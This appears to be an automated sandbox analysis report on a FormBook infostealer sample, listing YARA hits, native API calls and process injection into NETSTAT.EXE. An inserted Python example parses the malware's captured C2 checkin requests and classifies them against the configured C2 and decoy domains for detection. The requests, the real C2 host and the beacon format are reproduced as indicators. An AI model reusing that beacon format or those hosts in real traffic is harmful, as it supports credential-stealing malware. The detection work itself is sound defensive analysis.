Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,
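Note what the captured traffic shows: every checkin in this run went to a domain from the configuration's decoy list (contecoliving.com, identityofplace.com, constipationhub.com, tententacleshydro.com), and the configured C2 host www.middlehambooks.com was never contacted during the sandbox window. All four requests share the same shape: GET to the configured path `/klf/`, two query parameters with the same keys (`KX6xM` and `-ZVxY8H`) in varying order, no User-Agent header, `Connection: close`, and seven NUL bytes of body on a GET. The Snort ET rules fired on that shape, not on the host, which is the right way round. The following added example, not part of the report, parses requests in exactly that form, scores the shape, and labels the host against the extracted configuration. The four observed requests are reproduced from the lines above; the fifth (to the configured C2) and sixth (an ordinary browser GET) are constructed controls, and the decoy list is cut down to the domains used.

```python
from typing import Dict, List
from urllib.parse import urlsplit

# Configuration as extracted by the report: C2 entry verbatim, decoy list
# reduced to the domains used below (the report lists 64).
CONFIG = {
    "C2 list": ["www.middlehambooks.com/klf/"],
    "decoy": ["contecoliving.com", "identityofplace.com",
              "constipationhub.com", "tententacleshydro.com"],
}


def raw_get(host: str, target: str, body: bytes = b"\x00" * 7, user_agent: str = None) -> bytes:
    """Build a request in the shape the sandbox printed: no User-Agent,
    Connection: close, seven NUL bytes of body on a GET."""
    lines = [f"GET {target} HTTP/1.1", f"Host: {host}", "Connection: close"]
    if user_agent:
        lines.insert(1, f"User-Agent: {user_agent}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


# Four requests as captured in the report, then two constructed controls.
REQUESTS = [
    raw_get("www.contecoliving.com", "/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D"),
    raw_get("www.identityofplace.com", "/klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up"),
    raw_get("www.constipationhub.com", "/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8"),
    raw_get("www.tententacleshydro.com", "/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up"),
    # constructed: a checkin to the configured C2 (not observed in the run); parameter value is made up
    raw_get("www.middlehambooks.com", "/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=AAAA"),
    # constructed: an ordinary browser-style GET for contrast
    raw_get("www.example.com", "/index.html", body=b"", user_agent="Mozilla/5.0"),
]


def parse_request(raw: bytes) -> Dict:
    """Split a raw HTTP/1.1 request into method, path, query keys, headers, body.
    Query keys are taken without percent- or plus-decoding so the values are
    left exactly as sent."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    keys = [p.split("=", 1)[0] for p in url.query.split("&") if p]
    return {"method": method, "path": url.path, "query_keys": keys,
            "host": headers.get("host", ""), "headers": headers, "body": body}


def normalize_host(host: str) -> str:
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str, config: Dict) -> str:
    """'c2' if the host is in the C2 list, 'decoy' if in the decoy list, else 'unknown'."""
    h = normalize_host(host)
    c2_hosts = {normalize_host(urlsplit("http://" + u).hostname or "") for u in config["C2 list"]}
    if h in c2_hosts:
        return "c2"
    if h in {normalize_host(d) for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def checkin_indicators(req: Dict, config: Dict) -> List[str]:
    """Names of the checkin-shape traits the request exhibits."""
    c2_paths = {urlsplit("http://" + u).path for u in config["C2 list"]}
    checks = {
        "path_from_config": req["path"] in c2_paths,
        "two_query_params": len(req["query_keys"]) == 2,
        "no_user_agent": "user-agent" not in req["headers"],
        "connection_close": req["headers"].get("connection", "").lower() == "close",
        "nul_body_on_get": req["method"] == "GET" and len(req["body"]) > 0
                           and not req["body"].strip(b"\x00"),
    }
    return [name for name, hit in checks.items() if hit]


def analyze(raw_requests: List[bytes], config: Dict) -> List[Dict]:
    out = []
    for raw in raw_requests:
        req = parse_request(raw)
        ind = checkin_indicators(req, config)
        out.append({"host": req["host"], "label": classify_host(req["host"], config),
                    "indicators": ind, "checkin": len(ind) == 5})
    return out


if __name__ == "__main__":
    for r in analyze(REQUESTS, CONFIG):
        print(f'{r["host"]:28} {r["label"]:8} checkin={r["checkin"]} {r["indicators"]}')
```

The practical consequence for blocking: a deny-list built from the "C2 list" field alone would not have stopped any of the four connections this run made, while the decoy list plus the path and request shape would have. Treat decoy domains as indicators in their own right, and alert on the shape (GET with NUL body, no User-Agent, the configured path) independently of the host.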

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | the same eight memory dumps and six unpacked PEs listed under "Yara detected FormBook" in AV Detection above

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419DB4 NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419E0A NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69E90 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69E10 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69DB4 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69D5A NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69E0A NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 0386B150 appears 35 times
          Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: String function: 00B7B150 appears 35 times
          Source: Y4U48592345670954.exe, 00000000.00000003.653543330.000000001F0BF000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Y4U48592345670954.exe
          Source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs Y4U48592345670954.exe
          Source: Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Y4U48592345670954.exe
          Source: Y4U48592345670954.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
